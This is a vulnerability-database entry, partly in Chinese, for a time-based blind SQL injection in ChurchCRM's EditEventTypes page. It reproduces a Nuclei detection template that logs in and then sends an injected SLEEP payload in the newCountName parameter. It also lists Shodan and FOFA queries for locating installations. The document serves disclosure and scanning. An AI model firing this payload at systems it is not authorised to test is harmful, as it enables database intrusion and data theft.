CVE-2025-1023: ChurchCRM - SQL Injection

日期: 2025-11-07 | 影响软件: ChurchCRM | POC: 已公开

漏洞描述

A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary SQL queries by exploiting a time-based blind SQL Injection vulnerability in the EditEventTypes functionality. The newCountName parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion.

PoC代码[已公开]

id: CVE-2025-1023

info:
  name: ChurchCRM - SQL Injection
  author: Kazgangap
  severity: critical
  description: |
    A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary SQL queries by exploiting a time-based blind SQL Injection vulnerability in the EditEventTypes functionality. The newCountName parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion.
  reference:
    - https://github.com/ChurchCRM/CRM/issues/7246
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-1023.md
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1023
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-1023
    cwe-id: CWE-89
    epss-score: 0.00706
    epss-percentile: 0.7137
    cpe: cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: churchcrm
    product: churchcrm
    shodan-query: http.title:"churchcrm"
    fofa-query: app="churchcrm"
  tags: cve,cve2025,authenticated,churchcrm,sqli

http:
  - raw:
      - |
        POST /session/begin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        User={{username}}&Password={{password}}

      - |
        @timeout 30s
        POST /EditEventTypes.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        EN_tyid=1&newEvtName=Test&newEvtStartTime=10:30:00&newCountName=1%27%20AND%20(SELECT%20SLEEP(8))%20AND%20%271%27%3D%271&Action=ADD

    matchers:
      - type: dsl
        dsl:
          - 'duration_2 >= 8'
          - 'status_code_2 == 500'
          - 'contains(body_2, "<title>ChurchCRM: Edit Event Types")'
        condition: and
# digest: 4a0a00473045022100c9451b46191455319d11df873c6869bcf318ddf0867dd0a30212b83031864bfe022033893e0c7433da0ed6c10287374fc88daceb73085c34cc2d4ea74d0d55b238e2:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-1023.yaml

相关漏洞推荐